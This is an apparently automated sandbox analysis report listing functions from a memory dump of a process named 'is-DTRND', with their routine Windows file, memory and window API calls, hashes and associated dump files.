Opcode ID: 277a05c85ebec95b677daa7bb2482bbd2ca573b6d5e399c714ed0240645873e2
Instruction ID: eb4620433745d6aaadd7bf7ad3eeabb131aa5636b129577f515715ec8a0a4f24
Opcode Fuzzy Hash: 277a05c85ebec95b677daa7bb2482bbd2ca573b6d5e399c714ed0240645873e2
Instruction Fuzzy Hash: 3EF08271604B04BEDB119F779C6282BBAFCEB09B1479348B6F800A2691E53CA810D938

Uniqueness

Uniqueness Score: -1.00%

Function 00450010 Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,00450064,?,00000000,?,0048AAB4,00000000,0048AB11), ref: 00450027
GetLastError.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,00450064,?,00000000,?,0048AAB4,00000000,0048AB11), ref: 00450036

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: c7ce94e31f8a084b0ea2430911861b691a4b1bf59cee07ff25789861d1a55257
Instruction ID: e382dd5a65e24b3f50033f774afbcb209a6bd790d932700bc5735f75aa734a37
Opcode Fuzzy Hash: c7ce94e31f8a084b0ea2430911861b691a4b1bf59cee07ff25789861d1a55257
Instruction Fuzzy Hash: 46E092652041506BEB20A65EA9C4F6B67DCCB89715F14407BF90CCB243D66CDC088779

Uniqueness

Uniqueness Score: -1.00%

Function 00450090 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004500AF
GetLastError.KERNEL32(?,?,?,00000000), ref: 004500B7

Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 5a7158e7444986506659a49d1eb44d979cf03257341ee793657bb57e050d1383
Instruction ID: 70d5300ea221fb13db4e7edc2c1539bb624e344269fe514c59b0ebe2e2d5d26d
Opcode Fuzzy Hash: 5a7158e7444986506659a49d1eb44d979cf03257341ee793657bb57e050d1383
Instruction Fuzzy Hash: AAE022363042009BD600E56DD880A9B73DCDF85364F140137B948CF1D1D621A8088735

Uniqueness

Uniqueness Score: -1.00%

Function 0044FEC8 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(FC4CE8FF,00000000,?,00000001,0048B7FE,00000001,00450783,?,00000000,00000000,00000000,00000002,00000000,00475FEC), ref: 0044FEDF
GetLastError.KERNEL32(FC4CE8FF,00000000,?,00000001,0048B7FE,00000001,00450783,?,00000000,00000000,00000000,00000002,00000000,00475FEC), ref: 0044FEEB

Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cb60dc994fdb58f6fd30ee60fac722b43d5cb035f3fef4d40adc55dee35bcc8d
Instruction ID: a7619251b444916c8741956ff12f53e4d139a61023e0390af440e1e9bb03c50d
Opcode Fuzzy Hash: cb60dc994fdb58f6fd30ee60fac722b43d5cb035f3fef4d40adc55dee35bcc8d
Instruction Fuzzy Hash: B6E01A712006109BEB20EAB988C1A5372D8DB09365B248577E554CF2D6E674D8048B64

Uniqueness

Uniqueness Score: -1.00%

Function 004500D0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,00468817,00000000), ref: 004500E6
GetLastError.KERNEL32(00000000,00000000,00000000,00000002,?,?,00468817,00000000), ref: 004500EE

Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 1f84f636d7aed398e8a55002bd7b6dca9c86fe22014109fec411f3ec6dbebd78
Instruction ID: 478af2f33ebd703c0d4577f78845ebd3da7e59fffd56f8655c17aff3044c8671
Opcode Fuzzy Hash: 1f84f636d7aed398e8a55002bd7b6dca9c86fe22014109fec411f3ec6dbebd78
Instruction Fuzzy Hash: 12E012653483006BEB00EA7999C1B2732D8DB44704F14843BF944CF192E674DC489B25

Uniqueness

Uniqueness Score: -1.00%

Function 00406374 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 00406376
GlobalFix.KERNEL32 ref: 0040637C

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Global$Alloc
String ID:
API String ID: 2558781224-0
Opcode ID: 087fe30b21aebed1bbee58ca71e5d77df2e4e99abecd686fd89f03d3296f4ac7
Instruction ID: 07c32bc500a51529e755b4af09eba18ccb7fdb045e1456979bcc42b0c290a474
Opcode Fuzzy Hash: 087fe30b21aebed1bbee58ca71e5d77df2e4e99abecd686fd89f03d3296f4ac7
Instruction Fuzzy Hash: E89002C4950E0024DC40B2B20C0AD3F243CD8C071D3C0586E3100B6096883CB800483D

Uniqueness

Uniqueness Score: -1.00%

Function 004014EC Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017F5), ref: 0040151B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017F5), ref: 00401542

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b47dfa8464c0bebe42472cbbc825c69c8bd26aa5f95237cd5ae25c2d008f6871
Instruction ID: 1d64295b8d0e0b9a38f8b2fc07ed469c99ec606e4b1f6f299006d044831eee91
Opcode Fuzzy Hash: b47dfa8464c0bebe42472cbbc825c69c8bd26aa5f95237cd5ae25c2d008f6871
Instruction Fuzzy Hash: 1FF0E2B2B0162027EB206A6A0C82B565A949BC5B94F154077FE09FF3D9D2798C0142A9

Uniqueness

Uniqueness Score: -1.00%

Function 00458FAC Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,00000000,004591B7,?,00000000,00000002,00000002), ref: 00459183

Part of subcall function 00450120: WriteFile.KERNEL32(?,?,00000000,00450352,00000000,00000000,?,?,?,00450352,00000000,00452881,?,0048B721,00000000,00452922), ref: 00450137

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: File$BuffersFlushWrite
String ID:
API String ID: 1012034594-0
Opcode ID: fc084228a5f3bce95dcc37af3930d5fd1fc9cfc622aaa5cead00cd3e00a863b0
Instruction ID: f6d7bcd8a638ef9ee0a8b890ff35cd320ba633cdf6a8f70c3da330163c3f7560
Opcode Fuzzy Hash: fc084228a5f3bce95dcc37af3930d5fd1fc9cfc622aaa5cead00cd3e00a863b0
Instruction Fuzzy Hash: FD51A434A002549BDB21DF25CC41ADAB3B5AB48305F0084EAED4DA7782DB78AEC98F54

Uniqueness

Uniqueness Score: -1.00%

Function 0047338C Relevance: 1.6, APIs: 1, Instructions: 125windowCOMMON

Download Yara Rule

APIs

SendNotifyMessageA.USER32(?,00000496,00002711,00000000), ref: 00473539

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MessageNotifySend
String ID:
API String ID: 3556456075-0
Opcode ID: 406bfaa0a0f6461ebf3d20fd7c0a2e407c418e642052626433dcb6596332ea9e
Instruction ID: 5f26c846c874c237317d49b59e9284bb37dbd34ad5eabb797bc4cc63f3ee7dfb
Opcode Fuzzy Hash: 406bfaa0a0f6461ebf3d20fd7c0a2e407c418e642052626433dcb6596332ea9e
Instruction Fuzzy Hash: 1D419571701100ABC704FF67EC8195B3B99AB46309B50C57BE4189B3A6CB38DE42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408670 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004087A6), ref: 0040868F

Part of subcall function 00406E80: LoadStringA.USER32 ref: 00406E9D

Part of subcall function 004085FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,004086C7,?,00000000,004087A6), ref: 0040861A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 3e7ba4ed7f0e26770ecbfb831b7533beda94131ecb45f0d50b2354c16359b1b6
Instruction ID: 4f2eaf13373ec13ac649366da4b0d92ec9f087c8981b90d6854472f7e8ab8ab6
Opcode Fuzzy Hash: 3e7ba4ed7f0e26770ecbfb831b7533beda94131ecb45f0d50b2354c16359b1b6
Instruction Fuzzy Hash: F2314335E01119ABCB00EF95CC819DEB779FF84304F158577E819B7296E738AE058B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC64 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FD01

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: a1eb52f22b76c53ae760d0cba3ba0fee6ca67c4428f9ab82f3aa03e8c29a4ecf
Instruction ID: ae21a754651b4d7bfca8d8f1b928a50cbc9cc80607ce74b669d1fde158d67b9e
Opcode Fuzzy Hash: a1eb52f22b76c53ae760d0cba3ba0fee6ca67c4428f9ab82f3aa03e8c29a4ecf
Instruction Fuzzy Hash: CB2162B0604745AFD340DF39944069ABBE4BB88344F04493EE488C3341E378E995DBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00441484 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0044149B

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction ID: 194a9317b808103a3cf425769d835fc826ab437ab4d68aafd0f4452bf6879e62
Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction Fuzzy Hash: D4F09030205109DBEF1CCF58D0658BF77B0EB48300B2081AFE50B873A0D634AE80D758

Uniqueness

Uniqueness Score: -1.00%

Function 00416618 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32 ref: 0041664D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 795260cd6bd7fdc1189ff6fc4d2ff421b563323c442d0d232bced7d330843685
Instruction ID: 4784d57ee1b8f141bf40eedc12857ac45983dbc9b624a9f018a5b701f057f4d2
Opcode Fuzzy Hash: 795260cd6bd7fdc1189ff6fc4d2ff421b563323c442d0d232bced7d330843685
Instruction Fuzzy Hash: 79F025B2601510AFDB94CF9CD8C0F9373ECEB0C210B0885A6FA08CF24AD264EC108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00414A7C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 00414AB7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00450120 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,00450352,00000000,00000000,?,?,?,00450352,00000000,00452881,?,0048B721,00000000,00452922), ref: 00450137

Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: b751efd3255d4a841dc3e1fe7360b7965272101c70944bba4a060f8c7084cced
Instruction ID: 708f7d19b7bcbf48abda36036a02f36691c1a97e19eb5ff369bf5b20e2c6477e
Opcode Fuzzy Hash: b751efd3255d4a841dc3e1fe7360b7965272101c70944bba4a060f8c7084cced
Instruction Fuzzy Hash: D6E01A763041206BEB14E65AD980FABA7DCDF86365F10407BB918DB216D664EC088B7A

Uniqueness

Uniqueness Score: -1.00%

Function 0042CCE8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 0042CBC4: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CD0A,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45), ref: 0042CBEC

6CF478A0.KERNEL32(00000000,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45,00450C87,00000000), ref: 0042CD13

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CharF478Prev
String ID:
API String ID: 808134145-0
Opcode ID: 826422539118c00cb358ad14803f379a64015754f7d17351edbefb4b4b434a86
Instruction ID: 4939b6534ddec3ce97c59771d6a4ebc4ee53a512033a795d2a80a6faa40a6cb6
Opcode Fuzzy Hash: 826422539118c00cb358ad14803f379a64015754f7d17351edbefb4b4b434a86
Instruction Fuzzy Hash: AFE065313047147FD701EAA29C92A5EBAACDB45714B91487AB40093591D57C6E009858

Uniqueness

Uniqueness Score: -1.00%

Function 0044FE7C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

6CAD5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FEBC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c645d677b9617e3fa70d0f2cdd418801873c83c401aa0c5be87cbbb6da078ae
Instruction ID: f45267872a4a72777867b24b92ebb1a1d10bd6d72e18b8631547a6d02b440940
Opcode Fuzzy Hash: 2c645d677b9617e3fa70d0f2cdd418801873c83c401aa0c5be87cbbb6da078ae
Instruction Fuzzy Hash: 18E012B63442183ED380EEAC6C81FA777DC970D764F048477F998D7281D57199158BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0042E6D0 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451D17,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E6EF

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: d8d863c8c55bd2bd23141fa6b36e162dd74dea1a6aeec0f79b4d400c45e841d5
Instruction ID: 30a6d8b6a2b2d4fcd76e97f60023192a96504a1e546af8f0f62a001159190bce
Opcode Fuzzy Hash: d8d863c8c55bd2bd23141fa6b36e162dd74dea1a6aeec0f79b4d400c45e841d5
Instruction Fuzzy Hash: 40E020B139472236F23500A76C4BF7F260D47D0700FA440267B11DE3D2D9EEE906019D

Uniqueness

Uniqueness Score: -1.00%

Function 0042DC7C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

6CAD64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DCA8

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328f01d9cbf36e17bdfe892db5b50aef09e64cadae7b24705b832a9b704e87e0
Instruction ID: f82a7914c31c63950c7971c7dc1cc064c3e673ecb44ced4aa894877575ddc420
Opcode Fuzzy Hash: 328f01d9cbf36e17bdfe892db5b50aef09e64cadae7b24705b832a9b704e87e0
Instruction Fuzzy Hash: 6CE075B2600119AF9B40DE8DDC41EEB37ADAB1D350B404026FA08D7200C274EC519BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00453494 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,000000FF,00468E7E,00000000,00469B46,?,00000000,00469B8F,?,00000000,00469CC8,?,00000000,?,00000000), ref: 004534AA

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

